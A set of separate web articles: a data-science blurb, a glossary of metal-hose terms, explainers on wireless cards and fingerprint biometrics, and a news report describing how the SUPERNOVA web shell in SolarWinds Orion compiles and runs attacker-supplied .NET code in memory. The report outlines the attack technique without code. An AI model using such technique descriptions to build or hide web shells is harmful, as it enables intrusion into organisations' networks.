At Experian, we are investing substantial time and resources into this burgeoning field.
We have years of experience harnessing the power of data. In fact, we have been gleaning insights from information to help our customers since before big data became a buzz word. Today, we are still using data assets to improve society. We are helping consumers, financial institutions, healthcare organizations, automotive companies, retailers and governmental organizations make more informed and effective decisions.
And we are committed to developing data science to improve our business. Our Data Labs are a prime example. These are staffed by teams of scientists with experience in stats and analytics. The unique combination of skills allows our labs to consider problems in new ways and identify previously undetected strategies. By analyzing billions of transactions and records, the Data Labs teams are improving the economy by solving strategic marketing and risk-management problems.
The future is bright and there’s still more we can do with data to drive growth and improve national policies. We’re working with the health care industry and others, from energy to automotive to the multi-family housing community and government to fully leverage data. But to do so we will need more individuals capable of interpreting data.
Going forward, data scientists will prove instrumental in using data for good. | <urn:uuid:51357a50-55f1-402c-800b-2dc3b78e7a85> | CC-MAIN-2022-40 | https://softwaretesting.cioreview.com/cxoinsight/the-science-behind-big-data-nid-17661-cid-112.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00741.warc.gz | en | 0.941234 | 905 | 2.890625 | 3 |
An analysis reports the detection of a backdoor possibly developed by the unidentified hacking team involved in the attack; known as Supernova, this is a web shell injected into SolarWinds Orion code that would allow threat actors to execute arbitrary code on systems that use the compromised version of the product.
A webshell is typically malware logic embedded in a script page and is most often implemented in an interpreted programming language or context (commonly PHP, Java JSP, VBScript and JScript ASP, and C# ASP.NET).
The webshell will receive commands from a remote server and will execute in the context of the web server’s underlying runtime environment.
The SUPERNOVA webshell is also apparently designed for secondary or upgraded persistence, but its novelty goes far beyond the conventional webshell malware.
SUPERNOVA takes a valid .NET program as a parameter. The .NET class, method, arguments and code data are compiled and executed in memory. There is no need for additional network callbacks other than the initial C2 request.
The attackers have built a silent and full-grown .NET API embedded in an Orion binary, whose user is typically highly privileged and positioned with a high degree of visibility within an organization’s network.
The attackers can then arbitrarily configure SolarWinds (and any local operating system feature on Windows exposed by the .NET SDK) with malicious C# code. The code is compiled on the fly during benign SolarWinds operation and is executed dynamically.
By leveraging the inbuilt trust of system administrators and routine tool patching, the webshell was implanted without raising any conventional alerts.
The implant itself is a trojanized copy of app_web_logoimagehandler.ashx.b6031896.dll, which is a proprietary SolarWinds .NET library that exposes an HTTP API. The endpoint serves to respond to queries for a specific .gif image from other components of the Orion software stack.
The four parameters codes, clazz, method and args are passed via GET query string to the trojanized logo handler component.
These parameters are then executed in a custom method that simply invokes the underlying operating system.
The attacker might send a request to the embedded webshell over the internet or through an internally compromised system.
The code is crafted to accept the parameters as components of a valid .NET program, which is then compiled in memory. No executable is dropped and thus the webshell’s execution evades most defender endpoint detections.
Tactics, Techniques and Procedures
The malware is secretly embedded onto a server, and then receives C2 signals remotely and executes them in the context of the server user.
Yet, SUPERNOVA is powerful due to its in-memory execution, sophistication in its parameters and execution and flexibility by implementing a full programmatic API to the .NET runtime.
Apart from eluding detections, the SolarStorm actors were skilled enough to purposely hide their traffic and behaviour in plain sight and to avoid leaving trace evidence behind.
According to the researchers, only by organizing multiple security appliances and applications in a single pane can defenders detect these attacks.
Palo Alto Networks customers are protected by the following:
- Endpoint protection through Cortex XDR.
- Malware sandbox detection through WildFire (Next-Generation Firewall security subscription).
- An array of defenses including IPS and AppID in Threat Prevention (Next-Generation Firewall security subscription).
- Threat intelligence with Cortex Data Lake.
Network defense orchestration with Cortex XSOAR. | <urn:uuid:2bf8604f-53e0-4db8-bc99-9910adbddd26> | CC-MAIN-2022-40 | https://gbhackers.com/new-supernova-backdoor/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00741.warc.gz | en | 0.900237 | 740 | 2.5625 | 3 |
What’s happening in the manufacturing industry right now is similar to what’s happening to many other industries: technology is moving too fast for humans to keep up with it. The promise of the Industrial Internet of Things (IIoT) is huge. Companies, in theory, have the potential to automate, calibrate, create, and distribute their goods while amassing tons of data to keep doing it better and faster. Still, according to research from IBM, a single manufacturing site can generate 2,200 terabytes of data in a single month, but most of that data goes unanalyzed. Most manufactures lack the necessary infrastructure—or organizational structure—to harness its value.
What we’re seeing with the IIoT is akin to what we’re seeing in other industries seeking to implement automation and AI into their processes. Most of the companies using the IIoT are still using just a fraction of what AI and machine learning are able to offer. What’s more, they’re doing it in smaller, more confined departments and business units, rather than using that data at scale. To do so would require stronger, more connected systems, and honestly a whole different way of seeing one’s enterprise structure.
What’s the IIoT—and How Is It Being Used Now?
The IIoT is a loose term for the industrial and manufacturing industries’ use of the Internet of Things. It isn’t so much one singular network as a wide ecosystem of separate companies using sensors and connectivity to glean more data/insights/safety from their manufacturing activities.
Everything at some point is manufactured. Cars, chips, clothes, planes, food packaging, electronics, etc. You name it, it’s been manufactured. But so many of these companies especially in industries stuck in legacy thinking like industrial machinery and aerospace, have been slow to adopt new technologies.
Up until now, the IIoT has been used for things like automation, predictive maintenance, and injury prevention—simple things that help keep companies running more safety and efficiently. But—not necessarily those “a-ha” moments AI and machine learning have promised in terms of bringing value to the enterprise.
Why is that? There are a couple main reasons. The first is that most companies simply don’t have a cohesive infrastructure in place to harness AI for all its worth. As far as we’ve come in digital transformation, most companies still have a mish-mash of systems and stacks working together—and every system is only as strong as its weakest part.
The second reason, and arguably just as important, is that we as humans simply aren’t there yet. It’s hard for us to “think” like AI. Therefore, it’s hard for us to envision how to put those systems in place so that they will work at their fullest capacity. This means not just which software to buy and which infrastructure to build, but how to organize our workflows and enterprise systems in such a way that they work seamlessly together. Rather than thinking in terms of a single segment of a company’s IIoT, the company itself needs to operate as a finely tuned IIoT in itself, with all team members, visionaries, developers, etc., working together to maximize technology’s potential. The hard thing about this: there is no template for it. Every company is different. Which is why it’s taking so long for all of us—in general—to get out the kinks.
Maximizing the IIoT: Innovation Through Strategic IT/OT Partnerships
At least on the tech side, hope is coming. As noted above, to be truly effective, manufacturing needs better technology for data processing and luckily, big tech is stepping up to offer them what they need. For instance, just recently, Siemens, IBM, and Red Hat announced a collaboration that would allow IIoT users to use a hybrid cloud solution to maximize their efforts. This collaboration would extend the deployment and flexibility of MindSphere, the IIoT solution created by Siemens, to be used on-premises and with the cloud. Why does it matter? Because the faster the data is able to be processed, the faster the insights can be utilized for better cost, safety, and time savings. Edge computing, AI, and better storage solutions are necessary for the speed and agility required to process data in real time. Being able to enjoy either on-site or cloud analytics is a huge boost for IIoT users.
They aren’t the only collaboration in the past year to make a difference. In October 2020, Honeywell and Microsoft announced a partnership that would build its domain specific applications on Microsoft Azure to drive new levels of productivity for industrial clients delivering more efficiency, simplicity, and better insights into managing processes. Honeywell, which may be best known for its industrial roots, is a perfect example of the converging forces that are bringing legacy industrial businesses into the modern IT era. With its Forge solutions now in market, Honeywell has transformed its business to be more IT centric focusing on SaaS, Big Data, and enterprise performance management (EPM) through a technology centric lens.
The IIoT is set to become a $263+ billion industry by 2027. Still, the fact that manufacturing has agreed to invest in the IIoT is not a guarantee that it will bring value to every company using it. The responsibility of that is not on big tech, it’s on the industry as a whole to reimagine what manufacturing and industrial revolution really look like—not just in terms of robots and automation, but in terms of business structure and business models. When we as humans finally get a handle on that side of the equation, I believe technology will be even better suited to helping us get the job done.
Futurum Research provides industry research and analysis. These columns are for educational purposes only and should not be considered in any way investment advice.
The original version of this article was first published on Forbes.
Daniel Newman is the Principal Analyst of Futurum Research and the CEO of Broadsuite Media Group. Living his life at the intersection of people and technology, Daniel works with the world’s largest technology brands exploring Digital Transformation and how it is influencing the enterprise. From Big Data to IoT to Cloud Computing, Newman makes the connections between business, people and tech that are required for companies to benefit most from their technology projects, which leads to his ideas regularly being cited in CIO.Com, CIO Review and hundreds of other sites across the world. A 5x Best Selling Author including his most recent “Building Dragons: Digital Transformation in the Experience Economy,” Daniel is also a Forbes, Entrepreneur and Huffington Post Contributor. MBA and Graduate Adjunct Professor, Daniel Newman is a Chicago Native and his speaking takes him around the world each year as he shares his vision of the role technology will play in our future. | <urn:uuid:b2c74b4a-0b32-4415-83c7-6afb6dddd182> | CC-MAIN-2022-40 | https://convergetechmedia.com/how-tech-partnerships-are-driving-the-expansion-of-the-industrial-iot/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00141.warc.gz | en | 0.950063 | 1,446 | 2.6875 | 3 |
Active Directory (AD) is the Microsoft's directory services for operating systems of the Windows Server family. Active Directory allows administrators to use group policies to ensure consistency in customizing user work environment, including centrally installing and updating software on multiple computers. At the same time, Active Directory networks can contain up to several million objects. In addition to storing information about objects and groups of directory services in a centralized database, Active Directory can act as a unified authorization system for many applications. It can also be integrated with other authorization services. | <urn:uuid:1f605f50-da2b-46d8-8fba-de955238ee21> | CC-MAIN-2022-40 | https://eocortex.com/support/cctv-glossary/active-directory | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00141.warc.gz | en | 0.938202 | 104 | 2.609375 | 3 |
Abrasion: External damage to a hose assembly caused by its being rubbed on a foreign object.
Ambient or Atmospheric Conditions: The surrounding conditions, such as temperature, pressure and corrosion, to which a hose assembly is exposed.
Amplitude of Vibration and/or Lateral Movement: The distance a hose assembly deflects laterally to one side from its normal position, when this deflection occurs on both sides of the normal hose centerline.
Anchor: A restraint applied to a pipeline to control its motion caused by thermal growth.
Annular: Refers to the convolutions on a hose that are a series of complete circles or rings located at right angle to the longitudinal axis of the hose (sometimes referred to as bellows).
Application: The service conditions that determine how a metal hose assembly will be used.
Armor or Casing: Flexible interlocked tubing placed over the entire length or in short lengths at the end of a metal hose to protect it from physical damage and to limit the bending radius.
Attachment: The method of fixing end fittings to flexible metal hose-welding, brazing, soldering, swaging or mechanical.
Axial Movement: Compression or elongation of the hose along its longitudinal axis.
Basket Weave: A braid pattern in which the strands of wire alternately cross over and under two braid bands (two over – two under).
Bend Radius: The radius of a bend measured to the hose centerline.
Braid: A flexible wire sheath surrounding a metal hose that prevents the hose from elongation due to internal pressure. Braid is composed of a number of wires wrapped helically around the hose while at the same time going under and over each other in a basket weave fashion.
Braid Angle: The acute angle formed by the braid strands and the axis of the hose.
Braid Construction: Term applies to description of braid, i.e., 36 x 8 x .014, 304L SS.
- 36 = number of carriers or bands in a braid
- 8 = number of wires on each carrier
- .014 = wire diameter in inches
- 304L = material, Type 304L stainless steel
Braid Sleeve, Braid Band or Ferrule: A ring made from tube or metal strip placed over the ends of a braided hose to contain the braid wires for attachment of fittings.
Braid Wear: Motion between the braid and corrugated hose which normally causes wear on the O.D. of hose.
Braided Braid: In this braid, the strands of wire on each carrier of the braiding machine are braided together, and then braided in normal fashion, hence the term braided braid.
Brazing: A process of joining metals using a non-ferrous filler metal, which melts above 800°F, yet less than the melting of the “parent metals” to be joined.
Butt Weld: A process in which the edges or ends of metal sections are butted together and joined by welding.
Casing: (See definition under Armor)
Controlled Flexing: Controlled flexing occurs when the hose is being flexed regularly, as in connections to moving components.
Examples: Platen presses, thermal growth in pipe work.
Convolution: The annular or helical flexing member in corrugated or strip wound hose.
Corrosion: The chemical or electro-chemical attack of a media upon a hose assembly.
Cycle-Motion: The movement from normal to extreme position and return.
Developed Length: The length of a hose plus fitting (overall) required to meet the conditions of a specific application.
Diamond Weave: A braid pattern in which the strands alternately cross over one and under one of the strands (one over – one under). Also known as plain weave.
Dye Penetrant Inspection or Test: A method for detecting surface irregularities, such as cracks, voids, porosity, etc. The surface to be checked is coated with a red dye that will penetrate existing defects. Dye is removed from surface and a white developer is applied. If there is a defect in the surface being checked, the red dye remaining in it causes the white developer to be stained, thereby locating the defective area.
Displacement: The amount of motion applied to a hose defined as inches for parallel offset and degrees for radial misalignment.
Dog-Leg Assembly: Two hose assemblies joined by a common elbow.
Duplex Assembly: An assembly consisting of two hose assemblies – one inside the other – and connected at the ends.
Effective Thrust Area – Hose and Bellows: The cross-sectional area described by the outside diameter (at the tops of the convolutions) less two times the metal thickness of the hose or bellows.
Elastic (Intermittent Flexure): The smallest radius that a given hose can be bent to without permanent deformation of the metal in its flexing members (convolutions or corrugations).
Erosion: The wearing away of the inside convolutions of a hose caused by the flow of the media conveyed, such as wet steam, abrasive particles, etc.
Exposed Length: The amount of active (exposed) hose in an assembly. Does not include the length of fittings and ferrules.
Fatigue: Failure of the metal structure associated with, or due to, the flexing of metal hose or bellows.
Ferrule: (See definition for Braid Sleeve)
Fitting: A loose term applied to the nipple, flange, union, etc., attached to the end of a metal hose.
Flat Braid: Has a braid angle greater than 45° (See Braid Angle).
Flow Rate: Pertains to a volume of media being conveyed in a given time period, e.g., cubic feet per hour, pounds per second, gallons per minute, etc.
Frequency: The rate of vibration or flexure of a hose in a given time period, e.g., cycles per second (CPS), cycles per minute (CPM), cycles per day (CPD), etc.
Galvanic Corrosion: Corrosion that occurs on the less noble of two dissimilar metals in direct contact with each other in an electrolyte, e.g., water, sodium chloride in solution, sulphuric acid, etc.
Guide (For Piping): A device that supports a pipe radially in all directions, but allows free longitudinal movement.
Hardware: A loose term used to describe parts of a hose assembly other than the hose and braid, e.g., fittings, collars, valves, etc.
Helical: Used to described a type of corrugated hose having one continuous convolution resembling a screw thread.
Helical Wire Armor: To provide additional protection against abrasion under rough operating conditions, metal hoses can be supplied with an external round or oval section wire spiral.
Inside Diameter: This refers to the free cross section of the hose and (in most cases) is identical to the nominal diameter.
Installation: Referring to the installed geometry of a hose assembly.
Interlocked Hose: Formed from profiled strip and wound into flexible metal tubing with no subsequent welding, brazing, or soldering. May be made pressure-tight by winding in strands of packing.
Intermittent Bend Radius: The designation for a radius used for non-continuous operation. Usually an elastic radius.
Lap Weld (LW): Type of weld in which the ends or edges of the metal overlap each other and are welded together.
Liner: Flexible sleeve used to line the I.D. of hose when the velocity of gaseous media is in excess of 180 ft. per second.
Loop Installation: The assembly is installed in a loop or “U” shape, and is most often used when frequent and/or large amounts of motion are involved.
Mechanical Fitting or Reusable Fitting: A fitting not permanently attached to a hose which can be disassembled and used again.
Medium (Singular)/Media (Plural): The substance(s) being conveyed through a piping system.
Minimum Bend Radius: The smallest radius to which a hose can be bent without suffering permanent deformation of its convolutions.
Misalignment: A condition in which two points, intended to be connected, will not mate due to their being laterally out of line with each other.
Nominal Diameter: A term used to define the dimensions of a component. It indicates the approximate inside diameter.
Offset – Lateral, Parallel, & Shear: The amount that the ends of a hose assembly are displaced laterally in relation to each other as the result of connecting two misaligned terminations in a piping system, or intermittent flexure required in a hose application.
Operating Conditions: The pressure, temperature, motion, media, and environment that a hose assembly is subjected to.
Outside Diameter: This refers to the external diameter of a metal hose, measured from the top of the corrugation or braiding.
Penetration (Weld): The percentage of wall thickness of the two parts to be joined that is fused into the weld pool in making a joint. Our standard for penetration of the weld is 100 percent, in which the weld goes completely through the parent metal of the parts to be joined and is visible on the opposite side from which the weld was made.
Percent Of Braid Coverage: The percent of the surface area of a hose that is covered by braid.
Permanent Bend: A short radius bend in a hose assembly used to compensate for misalignment of rigid piping, or where the hose is used as an elbow. Hose so installed may be subjected to minor and/or infrequent vibration or movement.
Pipe Gap: The open space between adjacent ends of two pipes in which a hose assembly may be installed.
Pitch: The distance between the two peaks of adjacent corrugation.
Ply, Plies: The number of individual thicknesse thicknesses of metal used in the construction of the wall of a corrugated hose.
Pressure: Usually expressed in pounds per square inch (PSI) and, depending on service conditions, may be applied internally or externally to a hose.
- Absolute Pressure – A total pressure measurement system in which atmospheric pressure (at sea level) is added to the gage pressure, and is expressed as PSIA.
- Atmospheric Pressure – The pressure of the atmosphere at sea level which is 14.7 PSI, or 29.92 inches of mercury.
- Burst Pressure (Actual And Rated)
- Actual – Failure of the hose determined by the laboratory test in which the braid fails in tensile, or the hose ruptures, or both, due to the internal pressure applied. This test is usually conducted at room temperature with the assembly in a straight line, but for special applications, can be conducted at elevated temperatures and various configurations.
- Rated – A burst value which may be theoretical, or a percentage of the actual burst pressure developed by laboratory test. It is expected that, infrequently, due to manufacturing limitations, an assembly may burst at this pressure, but would most often burst at a pressure greater than this.
- Deformation Pressure (Collapse) – The pressure at which the corrugations of a hose are permanently deformed due to fluid pressure applied internally, or, in special applications, externally.
- Feet of Water or Head Pressure – Often used to express system pressure in terms of water column height. A column of water 1 ft. high exerts a .434 PSI pressure at its base.
- Proof Pressure or Test Pressure – The maximum internal pressure which a hose can be subjected to without either deforming the corrugations, or exceeding 50 percent of the burst pressure. When a hose assembly is tested above 50 percent of its burst pressure, there often is a permanent change in the overall length of the assembly, which may be undesirable for certain applications.
- PSIA – Pounds per square inch absolute.
- PSIG – Pounds per square inch gauge.
- Pulsating Pressure – A rapid change in pressure above and below the normal base pressure, usually associated with reciprocating type pumps. This pulsating pressure can cause excessive wear between the braid and the tops of the hose corrugations.
- Shock Pressure – A sudden increase of pressure in hydraulic or pneumatic system, which produces a shock wave. This shock can cause severe permanent deformation of the corrugations in a hose as well as rapid failure of the assembly due to metal fatigue.
- Static Pressure – A non-changing constant pressure.
- Working Pressure – The pressure, usually internal, but sometimes external, imposed on a hose during operating conditions.
Profile: Used in reference to the contour rolled into strip during the process of manufacturing stripwound hose, or the finished shape of a corrugation; formed from a tube by either the “bump-out”, “sink” or roll forming processes, used in making corrugated hose.
Random Motion: The non-cyclic uncontrolled motion of a metal hose, such as occurs in manual handling.
Reusable Fitting: (See Mechanical Fitting)
Safety Factor: The relationship of working pressure to burst pressure.
Scale: Generally refers to the oxide in a hose assembly brought about by surface conditions or welding. An oxide.
Seamless: Used in reference to a corrugated metal hose made from a base tube that does not have a longitudinal seam as in the case of a butt welded or lap welded tube.
Squirm: A form of failure in which the hose is deformed into an “S” or “U” bend as the result of excessive internal pressure being applied or unbraided corrugated hose which has been axially compressed, loosening the braid, while the hose is pressurized. This is particularly true with long lengths of braided hose subjected to manual or mechanical handling.
Strand(s): Individual groups of wires in a braid. Each group is supplies from a separate carrier in the braiding machine.
Stress Corrosion: A form of corrosion in stainless steel normally associated with chlorides.
Tig Weld: The tungsten inert gas welding process sometimes referred to as shielded arc. The common trade name is heliarc.
Traveling Loop: A general classification of bending, wherein the hose is installed to a U-shaped configuration.
- Class A Loop – An application wherein the radius remains constant and one end of the hose moves parallel to the other end of the hose.
- Class B Loop – A condition wherein a hose is installed in a U-shaped configuration and the ends move perpendicular to each other so as to enlarge or decrease the width of the loop.
Torque (Torsion): A force that produces, or tends to produce, rotation of or torsion through one end of a hose assembly while the other end is fixed.
Velocity: The speed at which the medium flows through the hose, usually specified in feet per second.
Velocity Resonance: The sympathetic vibration of convolutions due to buffeting of high velocity gas or air flow.
Vibration: Low amplitude motion occurring at high frequency.
Welding: The process of localized join of two or more metallic components by means of heating their surfaces to a state of fusion, or by fusion with the use of additional filler materials. | <urn:uuid:b23274fd-7588-431a-a1d5-764d418c21f6> | CC-MAIN-2022-40 | https://jenkins.doctrackr.com/technical-tools-2/glossary/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00141.warc.gz | en | 0.917151 | 3,266 | 2.96875 | 3 |
Wireless Internet cards provide your PC or other type of mobile device with wireless connectivity to the Internet. Some devices come already equipped with a wireless Internet card where others require you to insert one in order to establish Internet connectivity. The type of Internet access you establish depends upon the wireless router that provides the signal since all routers work on different channels to prevent interference.
Wireless Internet cards are also called Local Area Network cards because they help you to establish connectivity to a nearby wireless network. The wireless Internet card provides a way for your PC to automatically find the nearest wireless network to help you access the Internet.
Anatomy of Wireless Internet
If you understand how wireless Internet works it makes it easier to understand the role that wireless Internet cards play in the establishment of Internet access. Wireless connectivity works through radio waves as opposed to transferring data over a phone line or DSL cable.
When you hear of hot spots this refers to a wireless access point that delivers an Internet signal via a wireless router. The router receives the Internet connection from the Internet Service Provider and then broadcasts the radio waves within a specific designated distance so you can pick up the signal with the wireless Internet card from your PC.
Purpose of the Wireless Internet Card
The wireless Internet card is inserted into your PC and it uses a small antenna to pick up the wireless signal for your PC to read. Some PCs come already equipped with a wireless Internet card which means they are ready to accept the nearest Internet signal from the router or wireless access point. If your PC is not WiFi enabled you can purchase a wireless Internet card to equip the PC to accept a wireless signal from the nearest access point.
Wireless Internet Card Operation
Wireless Internet cards operate at a higher frequency than actual radio waves to enable a faster rate of data transfer. Additionally, the cards communicate with the router on different channels to reduce the chances of interference in a public access location. All wireless Internet cards run by the standard set forth by the Institute of Electrical and Electronics Engineers which is based on the 802.11 standard. There are different variations of this standard which determine different speeds of data transfer. 802.11 is the standard with the variations consisting of 802.11b and 802.11g and the most recent 802.11n.
WEP vs. WPA Protection
Most wireless Internet cards offer some type of protection in addition to helping you to achieve wireless connectivity. If your mobile device is not equipped with a wireless card look for wireless card that has either Wired Equivalency Protection (WEP) or WiFi Protected Access (WPA). The difference between the WEP and WPA is that WEP helps to protect your data from hackers and other unscrupulous people who eavesdrop on wireless networks, especially unprotected public access networks. If you want more security WPA provides a higher grade of encryption than WEP by using encryption keys that change on a frequent basis for added protection when using wireless networks. This prevents hackers from intercepting your data during transmission over a wireless network.
Keep in mind that WEP or WPA reduces your chances of eavesdropping however data interception may still occur on public access networks. This is why it is important to play it safe and avoid entering passwords or accessing your financial records over a public network. Save these tasks for when you are connected to a more secure network.
Different Types of Wireless Internet Cards
There are different types of wireless cards that install both internally or externally on your PC. If you have a desktop PC chances are it is equipped with a PCI wireless adapter which is also known as a Peripheral Component Interconnect. This is a card slot that provides the PC with wireless capability.
A PCMCIA wireless adapter is designed for a laptop PC and either exists in the form of a PCIMIA slot or has a card that comes pre-installed when you purchase your laptop. If your laptop does not have this type of capability you can use a compact wireless Internet card that plugs into the USB port on your PC.
Purchasing a Wireless Internet Card
If you are looking to purchase a wireless Internet card you must choose one that is compatible with the operating system you use such as Windows or Mac. You should also decide what Internet speed is appropriate for your needs and then choose a wireless card that suits your purpose. Wireless cards vary in price range and according to the speed of data transfer.
This information should provide you with the basic understanding you need to learn for wireless Internet cards work and how they provide mobile connectivity for your laptop PC and other mobile devices. | <urn:uuid:ac701954-48f5-4f2c-9ac7-d414efe9d3b1> | CC-MAIN-2022-40 | https://internet-access-guide.com/how-wireless-internet-cards-work/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00141.warc.gz | en | 0.925802 | 915 | 3.46875 | 3 |
In recent years, biometric identification systems and fingerprint recognition systems in particular have been widely adopted by both government as well as private outfits. Governments across the nations have been using this technology for the purposes like civil identity, law enforcement, border control, access control, employee identification, attendance, etc. Business setups have been using it to save time by streamlining various processes like employee identification, physical and logical access control, user authentication, safeguarding cloud communication, etc. Biometric systems have been embraced by organizations of all sizes and shapes regardless their industry type and vertical. Availability of fingerprint sensors in affordable mobile devices and government national ID programs have particularly brought biometrics to common man and have increased awareness as well as acceptance. Biometric systems are also getting more and more inexpensive due to widespread implementation and increasing rate of adoption.
Evolution of biometric systems over generations
Early generations of biometric devices were not as efficient as modern ones. They were bulky, heavy and required supervision during operation. They were also not as fast as current devices, and required calibration for accuracy. PC integration was not available in first generation biometric devices and usage was limited to law enforcement applications. Second generation of biometric devices brought some improvements over first generation but were still expensive and had high FRR and/or FAR. Finger preparation was also required prior to scan as sensors were not as technologically advance as modern sensors. Only optical sensors were available in recognition systems, other sensing methods were either unavailable or under development. For second generation biometric systems, applications were limited to high security computing in vertical applications and building access control.
Current generation of biometric systems are available with sensors leveraging different techniques like capacitance, thermal, etc. to read fingerprints. They come with ability to detect liveness and do not require manual calibration. Current biometric recognition systems are considerably faster than earlier generations. They have SDKs available for PCs and come with encryption support. Mass production induced by increasing adoption rate has not only slashed prices of biometric systems, but also encouraged their usage in mainstream identification and authentication methods. Now billions of people use biometric identification and authentication in some or other way on a daily basis. From unlocking doors or unlocking phones, biometrics is always at work.
Increasing adoption rate – decreasing prices
Mass production cuts down prices, and that is what exactly happening with biometric recognition systems right now. Increasing numbers of implementation made mass production of biometric systems imperative and slashed prices. A biometric system’s price may depend on factors like brand, certifications, waterproofing, type of sensor, etc. A small USB fingerprint scanner can cost as little as $50 and a sophisticated ten finger scanner with live finger detection ability can cost $2500 as well. Increasing production and completion are expected to lower the prices further. Average selling price of global mobile fingerprint sensor volumes is estimated to be dropped to $2 per unit in 2020 which was as high as $5.5 in 2014.
Increasing adoption has helped bring down cost of biometric devices. Factors like economy of scale, increasing production and electronic components getting cheaper, have helped biometric systems to become affordable for small business and even for individual applications. Slashing prices are particularly evident in case of fingerprint scanners. Earlier, only high end or flagship mobile phones were equipped with fingerprint sensors, but now even a $100 smartphone offer a capacitive fingerprint sensor. Fingerprint recognition systems, which were earlier used only in high security facilities or restricted areas, are now commonly seen everywhere. Let it be office doors, server rooms, schools, banks, POS, etc., fingerprint scanners have made their way to everyday life. Due to mass production, building blocks of biometric systems are getting cheaper and new entrants are offering very competitive prices. Technological enhancements and introduction of new hardware also slash prices of previous iterations.
There are various elements to consider before choosing any modality to employ for a biometric application. Level of security required, cost of the biometric system, return on investment, etc., are some of the elements that may become deciding factor in employing a biometric recognition method.
|Biometrics Type||Accuracy||Cost||Size of Template||Long Term Stability||Security Level|
Fingerprinting: the biometric method of choice
Different biometric recognition methods offer different set of features, advantages and disadvantages. Cost is also an important factor to consider while choosing a biometric recognition system. For high security applications, multi-factor authentication or multi-modal biometric implementation can be considered, while low security applications can be implemented with single biometric modality. Multi-modal biometric applications may hike up the investment required multi-fold, so there has to be a balance of everything and a thorough return on investment study may be required before taking up multi-modal biometric recognition. Fingerprinting is the most popular modality among all biometric recognition methods. Being inexpensive, easy to implement and use, it has most penetration in authentication and access control applications as well as consumer electronics like mobile phones and portable devices. Fingerprint scanners make use of sensors to scan a pattern. These sensors come equipped with different techniques to read and produce image of the fingerprint pattern.
Optical sensors capture the image of fingerprints with a specialized digital camera setup. This is the most common type of fingerprint sensors, which are widely available at cheap prices. Optical sensors pose shortcomings like quality of scan is impacted with dirty fingers and they are easier to be tricked than other types of sensors.
Capacitive scanners make use of pixel array of capacitors instead of visible light, to produce image of fingerprints. Capacitive scanners are hard to forge because they cannot be fooled with fingerprint images. They are more expensive than optical sensors.
Ultrasonic scanners use very high frequency sound wave to read pattern of fingerprints. Ultrasonic sound waves reflected form the fingertip surface are measured by the sensor and fingerprint pattern image is produced. Performance of ultrasonic sensors stay unaffected by dirtiness of finger surface as it doesn’t capture image like optical sensors.
Thermal line sensors
These sensors read a fingerprint pattern by measuring temperature variation in fingertip ridges and valleys. It requires finger to be moved over a linearly arranged narrow array of thermal sensors. They are small in size and require finger movement to measure fingerprint patterns.
Cost of a fingerprint recognition system can be highly dependent on the sensor type used in the device.
Use of fingerprint scanners rose steeply during 2010s. Consumer electronics, specially mobile phones and tablets made extensive use of fingerprint sensors.
List of popular fingerprint devices
|Hamster Plus ($73.00)||★★★★☆|
|Secugen Hamster Plus is a versatile fingerprint reader with Auto-On™ and Smart Capture™, featuring a comfortable, ergonomic design.||Buy Now|
|Hamster IV ($89.00)||★★★★☆|
|Secugen Hamster IV fingerprint reader is built with the industry’s most rugged and advanced optical sensor using patented SEIR fingerprint biometric technology.||Buy Now|
|BioMini Plus 2 ($135.00)||★★★★★|
|BioMini Plus 2 is a high performance fingerprint authentication scanner which features Suprema’s award-winning algorithm.||Buy Now|
|Hamster Pro 20 ($82.00)||★★★★☆|
|High-performance, maintenance-free optical fingerprint sensor with Auto-On™ & Smart Capture™ features.||Buy Now|
|Lumidigm M301 ($233.00)||★★★★★|
|M301 is a high-performing stand-alone biometric reader equipped with Lumidigm’s word-class multi-spectral imaging technology.||Buy Now|
|Columbo comes with a full featured SDK to enable effective integration into applications. Available in desktop and embedded module (OEM) versions.||Buy Now|
|Fingkey Hamster I DX ($85.00)||★★★★☆|
|Fingkey Hamster I DX USB fingerprint reader for precise user authentication through the distinct algorithm.||Buy Now|
|Hamster Pro ($45.00)||★★★☆☆|
|Hamster Pro features advanced optical sensors engineered with patented technology.||Buy Now|
|Watson Mini ($350.00)||★★★★★|
|Small, light, and fast dual fingerprint scanner enables fingerprint capture in standalone applications in combination with smart phones and tablets.||Buy Now|
|World’s smallest, lightest, and fastest two print (dual) fingerprint live scanner featuring Light Emitting Sensor technology.||Buy Now|
|Fingkey Hamster II ($99.00)||★★★★☆|
|Nitgen Fingkey Hamster II DX is a cutting-edge fingerprint sensor that prevents use of fake fingerprints.||Buy Now|
|Fingkey Hamster III ($115.00)||★★★★☆|
|Fingkey Hamster III fingerprint scanner can be connected to PC along with a normal mouse and used for all the areas involving passwords.||Buy Now|
|eNBioScan-D Plus ($700.00)||★★★★☆|
|eNBioScan-D Plus dual fingerprint scanner delivers fast, accurate and reliable results for identification, verification and enrollment programs.||Buy Now|
|eNBioScan-F is a FBI PIV certified advanced fingerprint recognition scanner with large fingerprint input window.||Buy Now|
Both, businesses and governments have recognized potential of biometric recognition systems and are leveraging them for various identification and authentication purposes. With successful adoption at various fronts like access control, civil identification, border control, law enforcement, etc. it can be said that biometrics is rapidly growing and has good prospects for the future. Global adoption and successful implementation across industries have showed that biometrics is the way forward. Market intelligence companies also predict exponential growth of biometric recognition in the future.
Newer trends like cloud biometrics is set to take the biometric affordability to the next level. According to an estimate by Frost and Sullivan, market revenue for fingerprint authentication on mobile devices is to increase from US$52.6 million in 2013 to US$396 million in 2019. Authentication with BaaS on mobile devices can safeguard crucial operations like banking transaction, authorization of payments, e-commerce transaction, etc. In banks, scalability is an important aspect to take care of. Launch of new branches, installation of ATMs, etc. are a part of on-going banking operations. Biometrics as a cloud service can benefit scalability intensive industries. New ATM with biometric capabilities will not only be securer than traditional card and PIN based authentication, but also be easy to deploy with cloud biometrics.
